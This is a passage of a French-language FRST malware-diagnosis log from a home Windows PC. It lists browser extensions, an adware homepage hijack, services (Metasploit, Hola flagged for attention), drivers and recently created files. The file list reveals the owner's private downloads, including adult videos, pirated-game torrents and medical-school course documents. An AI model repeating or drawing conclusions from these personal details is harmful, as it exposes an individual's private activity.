Data\ChromeDefaultData2\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2018-09-25] CHR Extension: (MEGA) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2018-10-11] CHR Extension: (Tampermonkey) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2018-09-06] CHR Extension: (Pixiv Ugoira WebM) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\gbloepphddjkabijnjhaplhhamkmkmik [2018-05-01] CHR Extension: (Google Docs Offline) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-22] CHR Extension: (AdBlock) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-09-19] CHR Extension: (Ugoira2GIF) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\ionmgpeclkmpjkmfejilaihdegkjehfj [2018-05-01] CHR Extension: (Chrome Adr) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\jiclpkloooednkohecgoedlhbiobhgip [2017-05-02] CHR Extension: (rikaikun) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\jipdnfibhldikgcjhfnomkfpcebammhp [2018-04-21] CHR Extension: (Video Downloader professional) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\kmdldgcmokdpmacblnehppgkjphcbpnn [2018-09-26] CHR Extension: (LuckySite123) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\kmifbkdmijonolmhonhiddefddgbeinn [2017-05-25] CHR Extension: (Chrome Web Store Payments) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03] CHR Extension: (Simple EPUB Reader) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\ojhbgcchcbdjdenibfmjofobklkkhofc [2018-06-16] CHR Extension: (LanguageTool - Grammar and Style Checker) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\oldceeleldhonbafppcapldpdifcinji [2018-08-20] CHR Extension: (Chrome Media Router) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-09-07] CHR Profile: C:\Users\Home\AppData\Local\Google\Chrome\User Data\Default [2018-06-25] CHR Extension: (Chrome Web Store Payments) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-17] CHR Extension: (Chrome Media Router) - C:\Users\Home\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-06-23] CHR HKLM\...\Chrome\Extension: [lbojggafdepnclikhiapkpinbfdhbdoi] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [lbojggafdepnclikhiapkpinbfdhbdoi] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [oaocmnfllndpbbmjmniielgaanaifehp] - hxxps://clients2.google.com/service/update2/crx StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495885976&z=a4effadaa12b72d53d47a0eg4z9t7wfbcb9watdb2o&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE Opera: ======= OPR Extension: (Any Media Downloader) - C:\Users\Home\AppData\Roaming\Opera Software\Opera Stable\Extensions\amghafhgmepemdnplpihhhgpgikhemdk [2018-09-24] OPR Extension: (DotVPN - mieux que VPN.) - C:\Users\Home\AppData\Roaming\Opera Software\Opera Stable\Extensions\hiegahbgoabbpoieploedhfnobmpgbeg [2018-06-13] OPR Extension: (Force Download) - C:\Users\Home\AppData\Roaming\Opera Software\Opera Stable\Extensions\klahcccondnnonafcbcdgbahphglbjjg [2018-09-24] OPR Extension: (Adblock Plus) - C:\Users\Home\AppData\Roaming\Opera Software\Opera Stable\Extensions\oidhhegpmlfpoeialbgcdocjalghfpkp [2018-09-23] ==================== Services (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 AdvancedSystemCareService11; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [1057552 2018-03-21] (IObit) R2 AESTFilters; C:\Program Files\IDT\WDM\AESTSr64.exe [89600 2013-11-12] (Andrea Electronics Corporation) [Fichier non signé] R2 Apache2.4; C:\xampp\apache\bin\httpd.exe [25600 2018-03-28] (Apache Software Foundation) [Fichier non signé] R2 BASSVC; C:\Program Files (x86)\Baidu Security\MoboMarket\1.2.8.4379\bassvc.exe [208928 2014-12-17] (Baidu, Inc.) S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [428056 2017-02-21] (BlueStack Systems, Inc.) R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [406040 2017-02-21] (BlueStack Systems, Inc.) S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [452632 2017-02-21] (BlueStack Systems, Inc.) R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation) R2 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [204880 2018-06-11] (CyberGhost S.A.) R2 D-Link Wireless N DWA-140_WPS; C:\Program Files (x86)\D-Link\DWA-140 revB\ANIWConnService.exe [53248 2010-07-12] () [Fichier non signé] S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-09] (Dropbox, Inc.) S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-09] (Dropbox, Inc.) R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2018-10-09] (Dropbox, Inc.) R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [3606632 2018-06-20] (Disc Soft Ltd) R2 Droid4XService; C:\Program Files (x86)\Droid4X\Droid4XService.exe [279552 2016-06-13] () [Fichier non signé] R2 DSAService; C:\Program Files (x86)\Intel Driver Update Utility\DSAService.exe [21240 2017-05-18] (Intel) S2 ESRV_SVC_QUEENCREEK; C:\Program Files\Intel\SUR\QUEENCREEK\esrv_svc.exe [824592 2017-03-07] () R2 ExpressVpnService; C:\Program Files (x86)\ExpressVPN\bootstrap\AMD64\nssm.exe [339168 2018-04-09] () R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Fichier non signé] <==== ATTENTION S2 hola_svc; C:\Program Files\Hola\app\hola_svc.exe [20538792 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION S2 hola_updater; C:\Program Files\Hola\app\hola_updater.exe [20137056 2017-12-24] (Hola Networks Ltd.) <==== ATTENTION R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [332656 2018-05-02] (HP Inc.) R2 HTCMonitorService; C:\Program Files (x86)\HTC\HTC Sync Manager\HSMServiceEntry.exe [87368 2016-09-20] (Nero AG) R2 iedvutils; C:\Program Files (x86)\Explorer\iedvutils.exe [55992 2017-03-01] () S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [149776 2018-06-28] (IObit) R2 ManyCam Service; C:\ProgramData\ManyCam\Service\service.exe [77528 2015-12-15] (Visicom Media Inc.) R2 metasploitProSvc; C:\metasploit\ruby\bin\ruby.exe [131680 2018-05-12] (hxxp://www.ruby-lang.org/) [Fichier non signé] R2 metasploitThin; C:\metasploit\ruby\bin\ruby.exe [131680 2018-05-12] (hxxp://www.ruby-lang.org/) [Fichier non signé] R2 metasploitWorker; C:\metasploit\ruby\bin\ruby.exe [131680 2018-05-12] (hxxp://www.ruby-lang.org/) [Fichier non signé] R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation) R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation) S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [3758336 2015-11-29] (INCA Internet Co., Ltd.) S3 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv.exe [37504 2016-12-07] (The OpenVPN Project) R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [166912 2013-10-17] () [Fichier non signé] R3 PDF Architect 4; C:\Program Files\PDF Architect 4\ws.exe [2438880 2016-08-05] (pdfforge GmbH) S3 PDF Architect 4 CrashHandler; C:\Program Files\PDF Architect 4\crash-handler-ws.exe [1038048 2016-08-05] (pdfforge GmbH) R2 PDF Architect 4 Creator; C:\Program Files\PDF Architect 4\creator-ws.exe [851168 2016-08-05] (pdfforge GmbH) R2 PDF Architect 4 Manager; C:\ProgramData\pdfforge\PDF Architect 4 Manager\PDF Architect 4\Architect Manager.exe [972056 2016-05-18] (© pdfforge GmbH.) S3 RzKLService; C:\Program Files (x86)\Razer\Razer Game Booster\RzKLService.exe [105448 2014-02-25] (Razer Inc.) R2 SparkSvc; C:\Program Files (x86)\baidu\Baidu Browser\sparkservice.exe [96784 2017-08-16] (Baidu Inc.) S3 SparkUpdater; C:\Program Files (x86)\Baidu\SparkUpdate\Sparkupdate.exe [1372472 2016-01-15] (Baidu.com, Inc.) R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [752224 2017-01-16] (DEVGURU Co., LTD.) R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [339456 2013-11-12] (IDT, Inc.) [Fichier non signé] S2 SystemUsageReportSvc_QUEENCREEK; C:\Program Files\Intel Driver Update Utility\SUR\SurSvc.exe [157456 2017-03-07] () R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10883824 2017-03-17] (TeamViewer GmbH) R2 TheCalendarService; C:\Program Files (x86)\CalendarTool\2.0.0.1000176\CalendarServ.exe [156816 2017-08-01] () S3 TuneUp.UtilitiesSvc; C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesService64.exe [2145080 2015-06-25] (TuneUp Software) R2 TunnelBearMaintenance; C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe [38272 2017-06-13] (TunnelBear) S3 USER_ESRV_SVC_QUEENCREEK; C:\Program Files\Intel\SUR\QUEENCREEK\esrv_svc.exe [824592 2017-03-07] () S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation) R2 WindscribeService; C:\Program Files (x86)\Windscribe\WindscribeService.exe [493232 2018-09-07] (Windscribe Limited) S3 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.3.227\WsAppService.exe [492768 2017-06-21] (Wondershare) R2 metasploitPostgreSQL; "C:\metasploit\postgresql\bin\pg_ctl.exe" runservice -N "metasploitPostgreSQL" -D "C:\metasploit\postgresql\data" ===================== Pilotes (Avec liste blanche) ====================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) S3 ampa; C:\Windows\system32\ampa.sys [38320 2016-12-25] () S3 ampa; C:\Windows\SysWOW64\ampa.sys [38320 2016-12-25] () R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [90560 2018-05-14] (Alcorlink Corp.) R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2011-02-21] () S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [310728 2016-06-15] () S3 BprotectEx; pas de ImagePath S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-02-21] (BlueStack Systems) S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-02-21] (Bluestack System Inc. ) R3 cpuz143; C:\Windows\temp\cpuz143\cpuz143_x64.sys [48960 2018-10-11] (CPUID) R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-01-23] (Disc Soft Ltd) R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-01-23] (Disc Soft Ltd) R1 ElRawDisk; C:\Windows\system32\drivers\rsdrvx64.sys [26024 2009-02-12] (EldoS Corporation) S3 epmntdrv; C:\Windows\system32\epmntdrv.sys [25032 2018-01-17] () R0 EPMVolFlt; C:\Windows\System32\drivers\EPMVolFlt.sys [21448 2018-07-20] (Windows (R) Codename Longhorn DDK provider) S3 EuGdiDrv; C:\Windows\system32\EuGdiDrv.sys [10848 2016-07-11] () [Fichier non signé] S3 expressvpnsplittunnel; pas de ImagePath S1 hnvaornf; pas de ImagePath R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2016-01-24] (REALiX(tm)) R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2014-04-24] (Intel Corporation) R3 iobit_monitor_server; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [14680 2016-12-21] (IObit) R3 IUProcessFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUProcessFilter.sys [19312 2018-05-12] (IObit) R3 IURegistryFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IURegistryFilter.sys [25488 2018-05-15] (IObit) S1 ktwmkzjb; pas de ImagePath R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [42696 2016-06-15] () R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [49304 2014-12-29] (Visicom Media Inc.) R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35992 2014-12-29] (Visicom Media Inc.) R3 mcdevice; C:\Windows\System32\DRIVERS\mcdevice.sys [334400 2015-07-17] (ShiningMorning Inc.) R2 memudrv; C:\Program Files\Microvirt\MEmuHyperv\MEmuDrv.sys [260328 2016-01-16] (Microvirt Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation) R1 MpKslfd8a568e; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{5C1EE902-5910-458A-A76D-2DBD88D80A6F}\MpKslfd8a568e.sys [58120 2018-10-11] (Microsoft Corporation) R3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1617472 2011-04-28] (Ralink Technology Corp.) R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation) R2 npf; C:\Windows\System32\drivers\npf.sys [36600 2015-11-15] (Riverbed Technology, Inc.) S1 p1170849579am; pas de ImagePath S1 p1441342821am; pas de ImagePath S1 p1479173690am; pas de ImagePath S1 p1487674648am; pas de ImagePath S1 p1487926957am; pas de ImagePath S1 p1487927091am; pas de ImagePath S1 p1487927226am; pas de ImagePath S1 p1487950865am; pas de ImagePath S1 p1488208420am; pas de ImagePath S1 p1488208516am; pas de ImagePath S1 p1488288266am; pas de ImagePath S1 p1488379278am; pas de ImagePath S1 p1488379420am; pas de ImagePath S1 p1488885334am; pas de ImagePath S1 p1488885610am; pas de ImagePath S1 p1489047223am; pas de ImagePath S1 p1489047372am; pas de ImagePath S1 p1490185907am; pas de ImagePath S1 p1490185997am; pas de ImagePath S1 p1490186046am; pas de ImagePath S1 p1490186089am; pas de ImagePath S1 p1490264007am; pas de ImagePath S1 p1490264137am; pas de ImagePath S1 p1490358229am; pas de ImagePath S1 p1490793491am; pas de ImagePath S1 p1490949514am; pas de ImagePath S1 p1490949639am; pas de ImagePath S1 p1745096627am; pas de ImagePath S1 p1829733048am; pas de ImagePath S1 p1894806702am; pas de ImagePath S1 p2542029531am; pas de ImagePath S1 p2957118427am; pas de ImagePath S1 p3518639370am; pas de ImagePath S1 p3623517036am; pas de ImagePath S1 p3676623125am; pas de ImagePath S1 p4207388602am; pas de ImagePath S1 p4243700627am; pas de ImagePath S1 p744739277am; pas de ImagePath S3 PCFApiUtil; pas de ImagePath S3 qcusbser; C:\Windows\System32\DRIVERS\qcusbser.sys [254520 2017-03-15] (QUALCOMM Incorporated) S3 RSUSBCCID; C:\Windows\System32\DRIVERS\RtsUCcid.sys [58072 2016-12-02] (Realtek Semiconductor Corp.) S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [11616 2000-10-18] () [Fichier non signé] S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [21984 2016-10-18] () S1 SRepairDrv; pas de ImagePath R3 tap-tb-0901; C:\Windows\System32\DRIVERS\tap-tb-0901.sys [38656 2017-06-13] (The OpenVPN Project) R3 tapexpressvpn; C:\Windows\System32\DRIVERS\tapexpressvpn.sys [35696 2017-11-03] (The OpenVPN Project) R3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42064 2016-08-23] (Anchorfree Inc.) R3 tapwindscribe0901; C:\Windows\System32\DRIVERS\tapwindscribe0901.sys [45560 2018-07-13] (The OpenVPN Project) S1 TSDefenseBt; pas de ImagePath S3 TuneUpUtilitiesDrv; C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesDriver64.sys [31144 2015-06-04] (TuneUp Software) R3 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [213080 2018-06-29] (Oracle Corporation) R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [222872 2018-06-29] (Oracle Corporation) S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB) U3 aswbdisk; pas de ImagePath U2 CWASRE; pas de ImagePath U2 snare; pas de ImagePath S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois - Créés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2018-10-11 22:23 - 2018-10-11 22:29 - 000000000 ____D C:\FRST 2018-10-11 22:21 - 2018-10-11 22:23 - 002414592 _____ (Farbar) C:\Users\Home\Downloads\FRST64.exe 2018-10-11 12:48 - 2018-10-11 12:49 - 203198978 _____ C:\Users\Home\Downloads\[Mangakas-Fansub] Iya na Kao Sare Nagara Opantsu Misete Moraitai VOSTFR [BD 1080p 10bits FLAC].mp4 2018-10-11 12:44 - 2018-10-11 12:44 - 000045196 _____ C:\Users\Home\Downloads\BLJM60223-[NieR RepliCant] (2).torrent 2018-10-10 19:59 - 2018-10-10 19:59 - 000000000 ____D C:\Users\Home\Downloads\drive-download-20181010T175032Z-001 2018-10-10 19:52 - 2018-10-10 19:52 - 030431994 _____ C:\Users\Home\Downloads\drive-download-20181010T175032Z-001.zip 2018-10-10 12:47 - 2018-10-10 12:47 - 034515443 _____ C:\Users\Home\Downloads\xvideos.com_d0106c875a9d51257b4552a1fd63d0d1.mp4 2018-10-10 12:47 - 2018-10-10 12:47 - 034228735 _____ C:\Users\Home\Downloads\xvideos.com_ff3374d81a5d866a6c8845d55bc18543.mp4 2018-10-10 12:47 - 2018-10-10 12:47 - 034127072 _____ C:\Users\Home\Downloads\xvideos.com_83fa34abdf2121480c287eeae9bd9b45.mp4 2018-10-10 12:45 - 2018-10-10 12:45 - 033012055 _____ C:\Users\Home\Downloads\xvideos.com_78fe8b97742afc2a7541de7e0bfeecc9.mp4 2018-10-10 12:45 - 2018-10-10 12:45 - 020093752 _____ C:\Users\Home\Downloads\xvideos.com_7efabd6efbe532fd71770764d2fbe54f.mp4 2018-10-10 12:38 - 2018-10-11 12:09 - 000000000 ____D C:\Users\Home\AppData\LocalLow\BitTorrent 2018-10-09 21:25 - 2018-10-09 21:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox 2018-10-09 20:56 - 2018-10-09 20:56 - 000001167 _____ C:\Users\Home\Desktop\Multi Virus Cleaner 2018.lnk 2018-10-09 20:56 - 2018-10-09 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Multi Virus Cleaner 2018 2018-10-09 20:56 - 2018-10-09 20:56 - 000000000 ____D C:\Program Files (x86)\AxBx 2018-10-09 20:52 - 2018-10-09 20:54 - 018036824 _____ (AxBx ) C:\Users\Home\Downloads\setup (3).exe 2018-10-09 15:40 - 2018-10-09 15:44 - 050861817 _____ C:\Users\Home\Downloads\xvideos.com_c40b9e7ef842fa9e330dc83bea3d1bd2.mp4 2018-10-09 15:39 - 2018-10-09 15:41 - 036742230 _____ C:\Users\Home\Downloads\xvideos.com_7a0ecee5d6f3a23f70dc787d3599eaa1.mp4 2018-10-09 13:53 - 2018-10-09 13:53 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe 2018-10-09 13:53 - 2018-10-09 13:53 - 000050232 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys 2018-10-09 13:53 - 2018-10-09 13:53 - 000050232 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys 2018-10-09 13:53 - 2018-10-09 13:53 - 000045640 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys 2018-10-09 13:04 - 2018-10-09 13:15 - 100025359 _____ C:\Users\Home\Downloads\Tiny Evil 1 Subbed.mp4 2018-10-08 22:35 - 2018-10-08 22:35 - 000013274 _____ C:\Users\Home\Downloads\Liste TP Histo MED - 2018-2019 (1).pdf 2018-10-08 22:35 - 2018-10-08 22:35 - 000004462 _____ C:\Users\Home\Downloads\Horaire étudiants TP Histo MED-DENT11 - 2018-2019 (1).pdf 2018-10-08 19:05 - 2018-10-08 19:05 - 000057560 _____ C:\Users\Home\Downloads\Dishonored Trilogy-CorePack.torrent 2018-10-08 17:45 - 2018-10-08 17:45 - 105035185 _____ C:\Users\Home\Downloads\xvideos.com_5154ea0071d3193559552f18c90f537d.mp4 2018-10-08 17:45 - 2018-10-08 17:45 - 035628656 _____ C:\Users\Home\Downloads\xvideos.com_0d8d17f53ec885b929c6868835b43d31.mp4 2018-10-08 17:44 - 2018-10-08 17:45 - 041645290 _____ C:\Users\Home\Downloads\xvideos.com_0e48b319f3bd9d3cf501b172bf6ec543.mp4 2018-10-08 17:44 - 2018-10-08 17:44 - 033787966 _____ C:\Users\Home\Downloads\xvideos.com_385ede01445c5fc43822461b62924dc7.mp4 2018-10-07 17:47 - 2018-10-07 17:48 - 077637978 _____ C:\Users\Home\Downloads\Dragon-on Dragoon Drakengard 3 Route D Last Boss Timing Guide.mp4 2018-10-07 17:47 - 2018-10-07 17:48 - 077637978 _____ C:\Users\Home\Downloads\Dragon-on Dragoon Drakengard 3 Route D Last Boss Timing Guide (1).mp4 2018-10-07 11:43 - 2018-10-07 11:43 - 000004462 _____ C:\Users\Home\Downloads\Horaire étudiants TP Histo MED-DENT11 - 2018-2019.pdf 2018-10-07 11:42 - 2018-10-07 11:42 - 000013274 _____ C:\Users\Home\Downloads\Liste TP Histo MED - 2018-2019.pdf 2018-10-07 11:42 - 2018-10-07 11:42 - 000005204 _____ C:\Users\Home\Downloads\Dispenses cours Histo MED - 2018-2019.pdf 2018-10-05 21:29 - 2018-10-05 21:29 - 000185924 _____ C:\Users\Home\Downloads\k-upload-file_2018-06-30-12b21aac3ratiomaster1.rar 2018-10-05 21:29 - 2018-10-05 21:29 - 000000000 ____D C:\Users\Home\Downloads\k-upload-file_2018-06-30-12b21aac3ratiomaster1 2018-10-05 21:08 - 2018-10-05 21:08 - 000057566 _____ C:\Users\Home\Downloads\NieR Automata Version PC FitGirl Repack (4).torrent 2018-10-05 14:06 - 2018-10-05 14:06 - 000253727 _____ C:\Users\Home\Documents\Avis d'enregistrement (facture) (6).pdf 2018-10-05 13:42 - 2018-10-05 13:42 - 000267467 _____ C:\Users\Home\Documents\Avis d'enregistrement (facture) cpas.pdf 2018-10-05 13:17 - 2018-10-05 13:17 - 000000162 ____H C:\Users\Home\Downloads\~$is d'enregistrement (facture) (6).pdf 2018-10-05 13:14 - 2018-10-05 13:14 - 000253727 _____ C:\Users\Home\Downloads\Avis d'enregistrement (facture) (6).pdf 2018-10-04 21:05 - 2018-10-04 21:32 - 000000000 ____D C:\Users\Home\Downloads\KanoBitch ~Kanojo ga Bitch ni natta Riyuu~ 2018-10-04 21:04 - 2018-10-04 21:04 - 000011611 _____ C:\Users\Home\Downloads\KanoBitch _Kanojo ga Bitch ni natta Riyuu_.torrent 2018-10-02 18:38 - 2018-10-02 18:39 - 304881455 _____ C:\Users\Home\Downloads\xvideos.com_2c17c4600d1f12194752fea35ee2e6d2.mp4 2018-10-02 18:36 - 2018-10-02 18:37 - 330920223 _____ C:\Users\Home\Downloads\xvideos.com_9de450d461a8d7a80e1ee6956061a5cc.mp4 2018-10-02 18:35 - 2018-10-02 18:37 - 136795589 _____ C:\Users\Home\Downloads\xvideos.com_960826370739a0c4a456838b8cff5a1a.mp4 2018-10-02 18:35 - 2018-10-02 18:36 - 044996935 _____ C:\Users\Home\Downloads\xvideos.com_bf8a48028f5f81b71ca94c1c0e9265e1-1.mp4 2018-10-02 18:34 - 2018-10-02 18:34 - 022236415 _____ C:\Users\Home\Downloads\xvideos.com_11be2f38ac7cd776ae6e4eb8079bead6-1.mp4 2018-10-02 18:33 - 2018-10-02 18:34 - 133874726 _____ C:\Users\Home\Downloads\xvideos.com_d3032710ef8ef0ec9ddc62bba7dfb2ff.mp4 2018-10-02 18:33 - 2018-10-02 18:33 - 119867268 _____ C:\Users\Home\Downloads\xvideos.com_047f6bcb561c9bba26cdd1c680526646.mp4 2018-10-02 18:27 - 2018-10-02 18:28 - 039555654 _____ C:\Users\Home\Downloads\xvideos.com_98b6854b591ce8652f57246aaa46e9eb.mp4 2018-10-02 18:27 - 2018-10-02 18:28 - 038265416 _____ C:\Users\Home\Downloads\xvideos.com_30b5c04f6a108baa8bebf7080d1e0e12.mp4 2018-10-02 18:26 - 2018-10-02 18:26 - 017583757 _____ C:\Users\Home\Downloads\xvideos.com_a86cabcc7a8b1d9a4b28baecdc0b680e-1.mp4 2018-10-02 18:25 - 2018-10-02 18:25 - 076116827 _____ C:\Users\Home\Downloads\xvideos.com_144271e22e48fd3d8870e3b6962d6c82.mp4 2018-10-02 18:23 - 2018-10-02 18:23 - 125187988 _____ C:\Users\Home\Downloads\xvideos.com_d0e5b6f03d6155dd935a42f7b31748c6.mp4 2018-10-01 20:40 - 2018-10-01 20:40 - 000006071 _____ C:\Users\Home\Downloads\Dispenses TPBio - MED - 2018-2019 (1).pdf 2018-10-01 20:10 - 2018-10-01 20:10 - 011640291 _____ C:\Users\Home\Downloads\Histologie_tableaux_tissus (2).pdf 2018-09-30 23:01 - 2018-09-30 23:01 - 078990717 _____ C:\Users\Home\Downloads\xvideos.com_e548c15c9d872c437f92edf1592692d5.mp4 2018-09-30 23:00 - 2018-09-30 23:00 - 036443453 _____ C:\Users\Home\Downloads\xvideos.com_a4ce3aca2ef2822d84c480b43e9e0e9d.mp4 2018-09-30 23:00 - 2018-09-30 23:00 - 032948343 _____ C:\Users\Home\Downloads\xvideos.com_d1faa2d793c42b142cdea42ae67c741b.mp4 2018-09-30 22:58 - 2018-09-30 22:58 - 050525718 _____ C:\Users\Home\Downloads\xvideos.com_612a480829fc50df1d8a7af3eb7c3ebb.mp4 2018-09-30 17:23 - 2018-09-30 17:23 - 000375552 _____ C:\Users\Home\Downloads\Listes de N° de TP - MED.pdf 2018-09-30 17:23 - 2018-09-30 17:23 - 000352746 _____ C:\Users\Home\Downloads\Listes de N° de TP - DENT.pdf 2018-09-30 17:23 - 2018-09-30 17:23 - 000185683 _____ C:\Users\Home\Downloads\Horaire des TP de physique 2018-2019 MED-DENT.pdf 2018-09-30 17:16 - 2018-09-30 17:16 - 000006071 _____ C:\Users\Home\Downloads\Dispenses TPBio - MED - 2018-2019.pdf 2018-09-30 17:15 - 2018-09-30 17:15 - 000013547 _____ C:\Users\Home\Downloads\Liste TPBio - MED - 2018-2019.pdf 2018-09-30 17:15 - 2018-09-30 17:15 - 000005242 _____ C:\Users\Home\Downloads\Programme TP Biologie et Embryologie MED DENT - 2018-2019 (1).pdf 2018-09-30 17:14 - 2018-09-30 17:14 - 000005470 _____ C:\Users\Home\Downloads\TP Bio MED-DENT - Horaire par semaine - 2018-2019 (version étudiants).pdf 2018-09-30 17:12 - 2018-09-30 17:12 - 001341002 _____ C:\Users\Home\Downloads\EPI-1 Cataract-microcornea.pdf 2018-09-29 21:10 - 2018-09-29 21:10 - 000020001 _____ C:\Users\Home\Downloads\Drakengard.3.Collectors.Edition.PlayStation3.torrent 2018-09-29 18:02 - 2018-09-29 21:23 - 000000000 ____D C:\Program Files (x86)\AOMEI Partition Assistant Pro Edition 7.1 2018-09-29 18:02 - 2018-09-29 18:02 - 000001246 _____ 